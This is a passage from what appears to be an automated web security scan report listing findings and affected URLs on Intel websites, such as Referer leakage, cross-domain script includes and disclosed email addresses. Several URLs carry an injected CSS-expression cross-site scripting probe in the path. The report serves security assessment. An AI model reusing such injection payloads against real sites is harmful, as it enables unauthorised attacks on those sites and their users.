12.58. http://www.intc.com/briefcase.cfm

12.59. http://www.intc.com/common/download/download.cfm

12.60. http://www.intc.com/common/download/download.cfm

12.61. http://www.intc.com/common/mobile/

12.62. http://www.intc.com/contactUs.cfm

12.63. http://www.intc.com/corpInfo.cfm

12.64. http://www.intc.com/education.cfm

12.65. http://www.intc.com/eventdetail.cfm

12.66. http://www.intc.com/events.cfm

12.67. http://www.intc.com/faq.cfm

12.68. http://www.intc.com/financial-statements.cfm

12.69. http://www.intc.com/financials.cfm

12.70. http://www.intc.com/index.cfm

12.71. http://www.intc.com/investorkit.cfm

12.72. http://www.intc.com/investornews.cfm

12.73. http://www.intc.com/outlook.cfm

12.74. http://www.intc.com/priceList.cfm

12.75. http://www.intc.com/ratios.cfm

12.76. http://www.intc.com/releasedetail.cfm

12.77. http://www.intc.com/results.cfm

12.78. http://www.intc.com/search.cfm

12.79. http://www.intc.com/sec.cfm

12.80. http://www.intc.com/shareServices.cfm

12.81. http://www.intc.com/stock.cfm

12.82. http://www.intc.com/ticktock.cfm

12.83. http://www.intc.com/videoDetail.cfm

12.84. http://www.intel.com/business/home

12.85. http://www.intel.com/business/index.htm

12.86. http://www.intel.com/business/index.htm

12.87. http://www.intel.com/business/index.htm

12.88. http://www.intel.com/community/index.htm

12.89. http://www.intel.com/community/index.htm

12.90. http://www.intel.com/consumer/learn/processors/index.htm

12.91. http://www.intel.com/consumer/learn/processors/index.htm

12.92. http://www.intel.com/design/index.htm

12.93. http://www.intel.com/design/index.htm

12.94. http://www.intel.com/experience/index.htm

12.95. http://www.intel.com/experience/index.htm

12.96. http://www.intel.com/in/business/index.htm

12.97. http://www.intel.com/in/business/index.htm

12.98. http://www.intel.com/intel/cr/gcr/overview.htm

12.99. http://www.intel.com/intel/cr/gcr/overview.htm

12.100. http://www.intel.com/intel/education/index.htm

12.101. http://www.intel.com/intel/education/index.htm

12.102. http://www.intel.com/intel/environment/index.htm

12.103. http://www.intel.com/intel/foundation/index.htm

12.104. http://www.intel.com/intel/foundation/index.htm

12.105. http://www.intel.com/intel/index.htm

12.106. http://www.intel.com/kr/business/index.htm

12.107. http://www.intel.com/newsroom/assets/images/

12.108. http://www.intel.com/p/en_US/business/technology

12.109. http://www.intel.com/pressroom/index.htm

12.110. http://www.intel.com/products/index.htm

12.111. http://www.intel.com/sites/sitewide/survey/pix/

12.112. http://www.intel.com/support/index.htm

12.113. http://www.intel.com/technology/index.htm

12.114. http://www.intel.com/th/business/index.htm

12.115. http://www.intel.com/th/business/index.htm

12.116. http://www.intel.com/tw/business/index.htm

12.117. http://www.opensource.org/licenses/mit-license.php

12.118. http://www.sigcse.org/

12.119. http://a9.com/-/spec/opensearch/1.1/

12.120. http://code.google.com/p/simplemodal/

12.121. http://code.google.com/p/swfobject/

12.122. http://digg.com/submit

12.123. http://downloadcenter.intel.com/default.aspx

12.124. http://m.youtube.com/details

12.125. http://newsroom.intel.com/community/de_de

12.126. http://newsroom.intel.com/community/en_eu/

12.127. http://newsroom.intel.com/community/en_ie

12.128. http://newsroom.intel.com/community/en_uk

12.129. http://newsroom.intel.com/community/en_za/

12.130. http://newsroom.intel.com/community/es_es

12.131. http://newsroom.intel.com/community/intel_newsroom

12.132. http://newsroom.intel.com/community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us

12.133. http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists

12.134. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

12.135. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

12.136. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

12.137. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

12.138. http://newsroom.intel.com/community/intel_newsroom/free_press/

12.139. http://newsroom.intel.com/community/pt_br

12.140. http://newsroom.intel.com/docs/DOC-1405

12.141. http://newsroom.intel.com/docs/DOC-1406

12.142. http://newsroom.intel.com/docs/DOC-1502

12.143. http://newsroom.intel.com/docs/DOC-1512

12.144. http://newsroom.intel.com/docs/DOC-1641

12.145. http://newsroom.intel.com/docs/DOC-1801

12.146. http://newsroom.intel.com/people/KrystalTemple

12.147. http://newsroom.intel.com/people/cldotts

12.148. http://newsroom.intel.com/people/pdarling

12.149. http://newsroom.intel.com/people/suzyintel

12.150. http://objectivemarketer.com/

12.151. http://rss.intel.com/rss/intel-master-pressfeed.xml

12.152. http://www.facebook.com/Intel

12.153. http://www.facebook.com/sharer.php

12.154. http://www.flickr.com/apps/slideshow/show.swf

12.155. http://www.flickr.com/photos/intelphotos

12.156. http://www.youtube.com/channelintel

12.157. http://www.youtube.com/view_play_list

12.158. http://www.youtube.com/watch

12.159. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s832051251078

13. Password field with autocomplete enabled

13.1. http://digg.com/submit

13.2. http://digg.com/submit

13.3. http://software.intel.com/en-us/

13.4. http://software.intel.com/en-us/

13.5. http://software.intel.com/en-us/articles/intel-cloud-builders-overview/

13.6. http://software.intel.com/en-us/blogs/

13.7. http://software.intel.com/en-us/blogs/2011/01/31/everyone-has-a-dream/

13.8. http://software.intel.com/en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/

13.9. http://software.intel.com/en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/

13.10. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

13.11. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

13.12. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

13.13. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

13.14. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

13.15. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

13.16. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

13.17. http://twitter.com/EricMMartin

13.18. http://twitter.com/intel

13.19. http://twitter.com/intelnews

13.20. http://www.connect.facebook.com/widgets/fan.php

13.21. http://www.ericmmartin.com/projects/simplemodal/

13.22. http://www.facebook.com/Intel

13.23. http://www.facebook.com/sharer.php

13.24. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

13.25. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

13.26. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

13.27. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

13.28. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm

13.29. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm

14. Source code disclosure

14.1. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

14.2. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

15. Referer-dependent response

15.1. http://www.connect.facebook.com/widgets/fan.php

15.2. http://www.youtube.com/cp/vjVQa1PpcFNbtPuEzn9t8IoLmKkc5WncB0tdgv7Cbmg=

16. Cross-domain POST

16.1. http://blogs.intel.com/csr/16

16.2. http://blogs.intel.com/csr/assets_c/2011/02/DSC07688-thumb-300x225-thumb-200x150.jpg&

16.3. http://blogs.intel.com/csr/assets_c/2011/02/DSC07688-thumb-300x225.php&

16.4. http://blogs.intel.com/csr/tag/

16.5. http://blogs.intel.com/healthcare/healthcare/

16.6. http://blogs.intel.com/healthcare/tag/

16.7. http://blogs.intel.com/jobs/tag/

16.8. http://flesler.blogspot.com/

16.9. http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html

16.10. http://flesler.blogspot.com/2007/10/jqueryscrollto.html

16.11. http://scoop.intel.com/

16.12. http://scoop.intel.com/gapingvoid-art-gallery/

17. Cross-domain Referer leakage

17.1. http://ark.intel.com/

17.2. http://communities.intel.com/community/tech

17.3. http://communities.intel.com/community/tech/desktop

17.4. http://communities.intel.com/index.jspa

17.5. http://digg.com/submit

17.6. http://downloadcenter.intel.com/default.aspx

17.7. http://edc.intel.com/

17.8. http://inside.intel.com/LOPFeedMashup

17.9. http://itcenter.intel.com/ResourceLibrary

17.10. http://newsroom.intel.com/archive.jspa

17.11. http://newsroom.intel.com/community/feeds

17.12. http://newsroom.intel.com/community/intel_newsroom

17.13. http://newsroom.intel.com/community/intel_newsroom/

17.14. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

17.15. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

17.16. http://newsroom.intel.com/recent-updates.jspa

17.17. http://scoop.intel.com/

17.18. http://software.intel.com/en-us/

17.19. http://software.intel.com/sites/academic_showcase/

17.20. http://twitter.com/share

17.21. http://www.connect.facebook.com/widgets/fan.php

17.22. http://www.connect.facebook.com/widgets/fan.php

17.23. http://www.facebook.com/sharer.php

17.24. http://www.intc.com/

17.25. http://www.intc.com/common/mobile/

17.26. http://www.intc.com/eventdetail.cfm

17.27. http://www.intc.com/index.cfm

17.28. http://www.intc.com/releasedetail.cfm

17.29. http://www.intc.com/sec.cfm

17.30. http://www.intc.com/videoDetail.cfm

17.31. http://www.intel.co.jp/jp/business/index.htm

17.32. http://www.intel.com/

17.33. http://www.intel.com/about/companyinfo/FAQ/index.htm

17.34. http://www.intel.com/about/companyinfo/capital/index.htm

17.35. http://www.intel.com/about/companyinfo/diversity/index.htm

17.36. http://www.intel.com/about/companyinfo/healthcare/index.htm

17.37. http://www.intel.com/about/companyinfo/index.htm

17.38. http://www.intel.com/about/companyinfo/museum/index.htm

17.39. http://www.intel.com/about/companyinfo/policy/index.htm

17.40. http://www.intel.com/about/companyinfo/worldahead/index.htm

17.41. http://www.intel.com/about/corporateresponsibility/community/index.htm

17.42. http://www.intel.com/about/corporateresponsibility/education/index.htm

17.43. http://www.intel.com/about/corporateresponsibility/environment/index.htm

17.44. http://www.intel.com/about/corporateresponsibility/foundation/index.htm

17.45. http://www.intel.com/about/corporateresponsibility/index.htm

17.46. http://www.intel.com/about/corporateresponsibility/report/index.htm

17.47. http://www.intel.com/about/index.htm

17.48. http://www.intel.com/about/map/index.htm

17.49. http://www.intel.com/ar_AE/consumer/products/processors/index.htm

17.50. http://www.intel.com/ar_EG/consumer/products/processors/index.htm

17.51. http://www.intel.com/ar_SA/consumer/products/processors/index.htm

17.52. http://www.intel.com/business/enterprise/emea/zaf/index.htm

17.53. http://www.intel.com/business/vpro/alliance/index.htm

17.54. http://www.intel.com/buy/

17.55. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm

17.56. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm

17.57. http://www.intel.com/cd/corporate/europe/emea/heb/287256.htm

17.58. http://www.intel.com/cd/corporate/europe/emea/ukr/364106.htm

17.59. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm

17.60. http://www.intel.com/cn/business/index.htm

17.61. http://www.intel.com/consumer/game/desktop/index.htm

17.62. http://www.intel.com/consumer/game/gaming-power.htm

17.63. http://www.intel.com/consumer/game/index.htm

17.64. http://www.intel.com/consumer/game/mobile/index.htm

17.65. http://www.intel.com/consumer/game/teams/events.htm

17.66. http://www.intel.com/consumer/index.htm

17.67. http://www.intel.com/consumer/products/

17.68. http://www.intel.com/consumer/products/index.htm

17.69. http://www.intel.com/consumer/products/processors/chipset.htm

17.70. http://www.intel.com/consumer/products/processors/comparison.htm

17.71. http://www.intel.com/consumer/products/processors/index.htm

17.72. http://www.intel.com/consumer/products/processors/ratings.htm

17.73. http://www.intel.com/consumer/products/smarttv/index.htm

17.74. http://www.intel.com/consumer/products/technology/index.htm

17.75. http://www.intel.com/consumer/shop/processors/index.htm

17.76. http://www.intel.com/consumer/shop/service-providers.htm

17.77. http://www.intel.com/consumer/shop/ssds.htm

17.78. http://www.intel.com/consumer/tomorrow/index.htm

17.79. http://www.intel.com/consumer/tomorrow/innovators/index.htm

17.80. http://www.intel.com/consumer/tomorrow/stories/index.htm

17.81. http://www.intel.com/consumer/tomorrow/tvads/index.htm

17.82. http://www.intel.com/corporate/europe/emea/irl/intel/index.htm

17.83. http://www.intel.com/costarica/index.htm

17.84. http://www.intel.com/design/network/ica/index.htm

17.85. http://www.intel.com/embedded/index.htm

17.86. http://www.intel.com/en_CA/index.htm

17.87. http://www.intel.com/en_MY/index.htm

17.88. http://www.intel.com/en_PH/index.htm

17.89. http://www.intel.com/en_SA/consumer/products/processors/index.htm

17.90. http://www.intel.com/en_US/worldwide.htm

17.91. http://www.intel.com/espanol/business/index.htm

17.92. http://www.intel.com/feedback.htm

17.93. http://www.intel.com/fr_CA/index.htm

17.94. http://www.intel.com/idf/index.htm

17.95. http://www.intel.com/intel/companyinfo/index.htm

17.96. http://www.intel.com/intel/corpresponsibility/index.htm

17.97. http://www.intel.com/intel/rss.htm

17.98. http://www.intel.com/itcenter/index.htm

17.99. http://www.intel.com/itcenter/industry/education/overview.htm

17.100. http://www.intel.com/itcenter/industry/fsi/overview.htm

17.101. http://www.intel.com/itcenter/itatintel/

17.102. http://www.intel.com/itcenter/itatintel/index.htm

17.103. http://www.intel.com/itcenter/products/atom/index.htm

17.104. http://www.intel.com/itcenter/products/core/core_vpro/index.htm

17.105. http://www.intel.com/itcenter/products/core/index.htm

17.106. http://www.intel.com/itcenter/products/index.htm

17.107. http://www.intel.com/itcenter/products/itanium/index.htm

17.108. http://www.intel.com/itcenter/products/xeon/index.htm

17.109. http://www.intel.com/itcenter/system/client/index.htm

17.110. http://www.intel.com/itcenter/system/internet_device/index.htm

17.111. http://www.intel.com/itcenter/system/networking/index.htm

17.112. http://www.intel.com/itcenter/system/server/index.htm

17.113. http://www.intel.com/itcenter/system/transactional/index.htm

17.114. http://www.intel.com/itcenter/system/workstation/index.htm

17.115. http://www.intel.com/itcenter/tool/vpro/index.htm

17.116. http://www.intel.com/itcenter/topics/cloud/index.htm

17.117. http://www.intel.com/itcenter/topics/index.htm

17.118. http://www.intel.com/itcenter/topics/performance/index.htm

17.119. http://www.intel.com/itcenter/topics/savings/index.htm

17.120. http://www.intel.com/itcenter/topics/virtualization/index.htm

17.121. http://www.intel.com/jobs/index.htm

17.122. http://www.intel.com/learn

17.123. http://www.intel.com/learn/

17.124. http://www.intel.com/learn/buying-guides/

17.125. http://www.intel.com/learn/practical-advice/

17.126. http://www.intel.com/p/en_US/business

17.127. http://www.intel.com/p/en_US/business/partnerprograms

17.128. http://www.intel.com/p/en_US/business/technology

17.129. http://www.intel.com/p/en_US/products

17.130. http://www.intel.com/p/en_US/products/server

17.131. http://www.intel.com/p/en_US/support

17.132. http://www.intel.com/portugues/business/index.htm

17.133. http://www.intel.com/products/chipsets/index.htm

17.134. http://www.intel.com/products/desktop/index.htm

17.135. http://www.intel.com/products/laptop/index.htm

17.136. http://www.intel.com/products/motherboard/index.htm

17.137. http://www.intel.com/products/processor/index.htm

17.138. http://www.intel.com/reseller/index.htm

17.139. http://www.intel.com/shop

17.140. http://www.intel.com/shop/desktops

17.141. http://www.intel.com/shop/laptops

17.142. http://www.intel.com/shop/netbooks

17.143. http://www.intel.com/siteindex.htm

17.144. http://www.intel.com/sites/sitewide/en_US/privacy/privacy.htm

17.145. http://www.intel.com/sites/sitewide/en_US/termsofuse.htm

17.146. http://www.intel.com/sites/sitewide/en_US/tradmarx.htm

17.147. http://www.intel.com/standards/index.htm

17.148. http://www.intel.com/support/detect.htm

17.149. http://www.intel.com/support/feedback.htm

17.150. http://www.intel.com/support/idyp.htm

17.151. http://www.intel.com/support/resources.htm

17.152. http://www.intel.com/technology/architecture-silicon/index.htm

17.153. http://www.intel.com/technology/manufacturing/index.htm

17.154. http://www.intel.com/technology/product/index.htm

17.155. http://www.intel.com/vi_VN/index.htm

17.156. http://www.youtube.com/view_play_list

18. Cross-domain script include

18.1. http://appdeveloper.intel.com/en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml

18.2. http://blogs.intel.com/csr/

18.3. http://blogs.intel.com/csr/2010/06/what_do_intel_chips_and_sam_ad.php

18.4. http://blogs.intel.com/csr/2011/01/solar_power_is_learning_power.php

18.5. http://blogs.intel.com/csr/2011/01/the_final_four_the_super_bowl.php

18.6. http://blogs.intel.com/csr/2011/02/investing_big_in_renewable_ene.php

18.7. http://blogs.intel.com/csr/2011/02/social_entrepreneurship_buzz_w.php

18.8. http://blogs.intel.com/csr/assets_c/2011/02/DSC07688-thumb-300x225.php

18.9. http://blogs.intel.com/csr/authors

18.10. http://blogs.intel.com/csr/education/

18.11. http://blogs.intel.com/csr/general-csr/

18.12. http://blogs.intel.com/csr/green/

18.13. http://blogs.intel.com/healthcare/

18.14. http://blogs.intel.com/healthcare/2011/01/waiting_and_innovating_for_21st_century_healthcare.php

18.15. http://blogs.intel.com/jobs/

18.16. http://blogs.intel.com/jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php

18.17. http://blogs.intel.com/jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php

18.18. http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php

18.19. http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php

18.20. http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php

18.21. http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php

18.22. http://blogs.intel.com/jobs/about-us/

18.23. http://blogs.intel.com/jobs/just-for-students/

18.24. http://blogs.intel.com/jobs/life-at-intel/

18.25. http://blogs.intel.com/jobs/your-future/

18.26. http://blogs.intel.com/research/

18.27. http://blogs.intel.com/technology/

18.28. http://code.google.com/p/simplemodal/

18.29. http://code.google.com/p/swfobject/

18.30. http://communities.intel.com/community/openportit/server

18.31. http://communities.intel.com/community/openportit/vproexpert

18.32. http://communities.intel.com/community/tech

18.33. http://communities.intel.com/community/tech/desktop

18.34. http://communities.intel.com/index.jspa

18.35. http://digg.com/submit

18.36. http://digg.com/submit

18.37. http://docs.jquery.com/UI

18.38. http://docs.jquery.com/UI/Accordion

18.39. http://docs.jquery.com/UI/Tabs

18.40. http://edc.intel.com/

18.41. http://edc.intel.com/About/

18.42. http://edc.intel.com/Platforms/Roadmap/

18.43. http://edc.intel.com/Step-by-Step/Selector-Guide/

18.44. http://flesler.blogspot.com/

18.45. http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html

18.46. http://flesler.blogspot.com/2007/10/jqueryscrollto.html

18.47. http://gmarwaha.com/jquery/jcarousellite/

18.48. http://idfcommunity.intel.com/

18.49. http://jquery.com/

18.50. http://jqueryui.com/about

18.51. http://newsroom.intel.com/ann-delete.jspa

18.52. http://newsroom.intel.com/ann-expire.jspa

18.53. http://newsroom.intel.com/archive.jspa

18.54. http://newsroom.intel.com/community/de_de

18.55. http://newsroom.intel.com/community/en_eu/

18.56. http://newsroom.intel.com/community/en_ie

18.57. http://newsroom.intel.com/community/en_uk

18.58. http://newsroom.intel.com/community/en_za/

18.59. http://newsroom.intel.com/community/es_es

18.60. http://newsroom.intel.com/community/feeds

18.61. http://newsroom.intel.com/community/intel_newsroom

18.62. http://newsroom.intel.com/community/intel_newsroom/

18.63. http://newsroom.intel.com/community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us

18.64. http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/26/forty-young-innovators-named-intel-science-talent-search-2011-finalists

18.65. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51"style="x:expression(alert(1))"f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

18.66. http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business

18.67. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-capgemini-offers-intel-atom-powered-home-energy-dashboard

18.68. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up

18.69. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours

18.70. http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/02/chip-shot-teach-your-children-well-fri-24-on-mashup-radio

18.71. http://newsroom.intel.com/community/intel_newsroom/blog/2011/images/jive-userbar-bg.png

18.72. http://newsroom.intel.com/community/intel_newsroom/emailPasswordToken!input.jspa

18.73. http://newsroom.intel.com/community/intel_newsroom/free_press/

18.74. http://newsroom.intel.com/community/pt_br

18.75. http://newsroom.intel.com/docs/DOC-1405

18.76. http://newsroom.intel.com/docs/DOC-1406

18.77. http://newsroom.intel.com/docs/DOC-1502

18.78. http://newsroom.intel.com/docs/DOC-1512

18.79. http://newsroom.intel.com/docs/DOC-1641

18.80. http://newsroom.intel.com/docs/DOC-1801

18.81. http://newsroom.intel.com/people/KrystalTemple

18.82. http://newsroom.intel.com/people/cldotts

18.83. http://newsroom.intel.com/people/pdarling

18.84. http://newsroom.intel.com/people/suzyintel

18.85. http://newsroom.intel.com/recent-updates.jspa

18.86. http://newsroom.intel.com/search.jspa

18.87. http://objectivemarketer.com/

18.88. http://opentools.homeip.net/

18.89. http://opentools.homeip.net/dev-tools-for-upnp

18.90. http://scoop.intel.com/

18.91. http://scoop.intel.com/gapingvoid-art-gallery/

18.92. http://twitter.com/EricMMartin

18.93. http://twitter.com/EricMMartin

18.94. http://twitter.com/intel

18.95. http://twitter.com/intelnews

18.96. http://www.connect.facebook.com/widgets/fan.php

18.97. http://www.connect.facebook.com/widgets/fan.php

18.98. http://www.ericmmartin.com/projects/simplemodal/

18.99. http://www.facebook.com/Intel

18.100. http://www.facebook.com/sharer.php

18.101. http://www.flickr.com/photos/intelphotos

18.102. http://www.flickr.com/photos/intelphotos

18.103. http://www.intc.com/intelAR2009/index.html

18.104. http://www.intc.com/ratios.cfm

18.105. http://www.intc.com/stock.cfm

18.106. http://www.intel.com/business/vpro/alliance/index.htm

18.107. http://www.intel.com/cd/software/partner/asmo-na/eng/index.htm

18.108. http://www.intel.com/consumer/products/

18.109. http://www.intel.com/consumer/products/index.htm

18.110. http://www.intel.com/consumer/products/processors/chipset.htm

18.111. http://www.intel.com/consumer/products/processors/core-family.htm

18.112. http://www.intel.com/consumer/products/processors/index.htm

18.113. http://www.intel.com/consumer/products/processors/ratings.htm

18.114. http://www.intel.com/consumer/products/technology/index.htm

18.115. http://www.intel.com/consumer/shop/processors/index.htm

18.116. http://www.intel.com/consumer/shop/ssds.htm

18.117. http://www.intel.com/en_CA/index.htm

18.118. http://www.intel.com/en_SA/consumer/products/processors/index.htm

18.119. http://www.intel.com/itcenter/products/core/core_vpro/index.htm

18.120. http://www.ipdps.org/

18.121. http://www.opensource.org/licenses/mit-license.php

18.122. http://www.youtube.com/view_play_list

19. Email addresses disclosed

19.1. http://blogs.intel.com/jobs/

19.2. http://blogs.intel.com/jobs/2010/10/hr_pathways_creating_my_new_life_with_intel.php

19.3. http://blogs.intel.com/jobs/2010/12/multiple_careers_at_one_company_or_one_career_at_multiple_companies.php

19.4. http://blogs.intel.com/jobs/2010/12/why_non-techies_should_consider_intel.php

19.5. http://blogs.intel.com/jobs/2011/01/a_glimpse_inside_the_start_of_my_intel_day.php

19.6. http://blogs.intel.com/jobs/2011/01/top_ten_reasons_i_work_for_intel.php

19.7. http://blogs.intel.com/jobs/2011/01/you_want_me_to_move_where.php

19.8. http://blogs.intel.com/jobs/about-us/

19.9. http://blogs.intel.com/jobs/just-for-students/

19.10. http://blogs.intel.com/jobs/life-at-intel/

19.11. http://blogs.intel.com/jobs/your-future/

19.12. http://code.google.com/p/swfobject/

19.13. http://communities.intel.com/community/openportit/vproexpert

19.14. http://flesler.blogspot.com/2007/10/jquerylocalscroll-10.html

19.15. http://gdata.youtube.com/feeds/api/videos/ZM0ptMqNhso/related

19.16. http://inside.intel.com/LOPFeedMashup

19.17. http://jqueryui.com/about

19.18. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

19.19. http://newsroom.intel.com/community/en_ie

19.20. http://newsroom.intel.com/community/en_za/

19.21. http://newsroom.intel.com/community/feeds/allcontent

19.22. http://newsroom.intel.com/community/feeds/blogs

19.23. http://newsroom.intel.com/community/feeds/documents

19.24. http://newsroom.intel.com/community/pt_br

19.25. http://newsroom.intel.com/opensearch.xml

19.26. http://newsroom.intel.com/recent-updates.jspa

19.27. http://objectivemarketer.com/

19.28. http://rss.intel.com/rss/intel-master-pressfeed.xml

19.29. http://sam.zoy.org/wtfpl/

19.30. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

19.31. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

19.32. http://www.gnu.org/licenses/gpl.html

19.33. http://www.intc.com/events.cfm

19.34. http://www.intc.com/faq.cfm

19.35. http://www.intc.com/intelAR2009/index.html

19.36. http://www.intc.com/releasedetail.cfm

19.37. http://www.intc.com/releasedetail.cfm

19.38. http://www.intc.com/shareServices.cfm

19.39. http://www.intc.com/sitewide/js/jquery-plugins.js

19.40. http://www.intel.com/about/companyinfo/policy/index.htm

19.41. http://www.intel.com/about/corporateresponsibility/foundation/index.htm

19.42. http://www.intel.com/business/vpro/alliance/index.htm

19.43. http://www.intel.com/cd/corporate/pressroom/apac/zho/index.htm

19.44. http://www.intel.com/corporate/europe/emea/irl/intel/index.htm

19.45. http://www.intel.com/embedded/index.htm

19.46. http://www.intel.com/espanol/pressroom/index.htm

19.47. http://www.intel.com/homepage/js/main.js

19.48. http://www.intel.com/sites/wap/cim_setup.js

19.49. http://www.intel.com/sitewide/js/jquery-plugins.js

19.50. http://www.opensource.org/licenses/mit-license.php

19.51. http://www.sigcse.org/

19.52. http://www.w3.org/1999/XSL/Transform

20. Private IP addresses disclosed

20.1. http://ark.intel.com/

20.2. http://digg.com/submit

20.3. http://digg.com/submit

20.4. http://digg.com/submit

21. Credit card numbers disclosed

22. Robots.txt file

22.1. http://inside.intel.com/LOPFeedMashup

22.2. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY4N4CIOTeAioFZK8AAAEyBWCvAAAP

22.3. http://www.facebook.com/extern/login_status.php

22.4. http://www.intel.com/about/corporateresponsibility/index.htm

23. HTML does not specify charset

23.1. http://ad.com/

23.2. http://jqueryui.com/about

23.3. http://lz1.intel.com/copyright/

23.4. http://onsite2.researchintel.com/engine/

23.5. http://onsite2.researchintel.com/engine/icorescript.asp

23.6. http://search.intel.com/TypeAheadDataFrame.htm

23.7. http://www.freedownloadscenter.com/Search/function.file

23.8. http://www.freedownloadscenter.com/Search/function.join

23.9. http://www.freedownloadscenter.com/Search/newsearch.php3

23.10. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3

23.11. http://www.intc.com/common/download/download.cfm

23.12. http://www.intc.com/releasedetail.cfm

23.13. http://www.intc.com/sites/sitewide/hat/40recode

23.14. http://www.intel.com/business/enterprise/emea/deu/index.htm

23.15. http://www.intel.com/business/enterprise/emea/eng/index.htm

23.16. http://www.intel.com/business/enterprise/emea/fra/index.htm

23.17. http://www.intel.com/business/enterprise/emea/ita/index.htm

23.18. http://www.intel.com/business/enterprise/emea/nld/index.htm

23.19. http://www.intel.com/business/enterprise/emea/pol/index.htm

23.20. http://www.intel.com/business/enterprise/emea/rus/index.htm

23.21. http://www.intel.com/business/enterprise/emea/spa/index.htm

23.22. http://www.intel.com/business/enterprise/emea/swe/index.htm

23.23. http://www.intel.com/business/enterprise/emea/tur/index.htm

23.24. http://www.intel.com/business/home

23.25. http://www.intel.com/business/vpro/alliance/index.htm

23.26. http://www.intel.com/buy/

23.27. http://www.intel.com/go/itp/index.htm

23.28. http://www.intel.com/intel/companyinfo/index.htm

23.29. http://www.intel.com/intel/corpresponsibility/index.htm

23.30. http://www.intel.com/newsroom/assets/images/

23.31. http://www.intel.com/p/IntelTheme/themes/dojolib/dojoc/productselector/ProductSelector.html

23.32. http://www.intel.com/pressroom/archive/releases/2010/20100125corp.htm

23.33. http://www.intel.com/pressroom/execbios.htm

23.34. http://www.intel.com/pressroom/jump/videobroadcast.htm

23.35. http://www.intel.com/pressroom/kits/advancedtech/index.htm

23.36. http://www.intel.com/pressroom/kits/chipmaking/index.htm

23.37. http://www.intel.com/pressroom/kits/embedded/index.htm

23.38. http://www.intel.com/pressroom/kits/sot/index.htm

23.39. http://www.intel.com/references/index.htm

23.40. http://www.intel.com/sites/sitewide/survey/pix/

23.41. http://www.intel.com/sitewide/pix/backgrounds/mini-promo1-text-tp.gif

23.42. http://www.intel.com/technology/architecture-silicon/index.htm

23.43. http://www.intel.com/technology/manufacturing/index.htm

23.44. http://www.intel.com/technology/product/index.htm

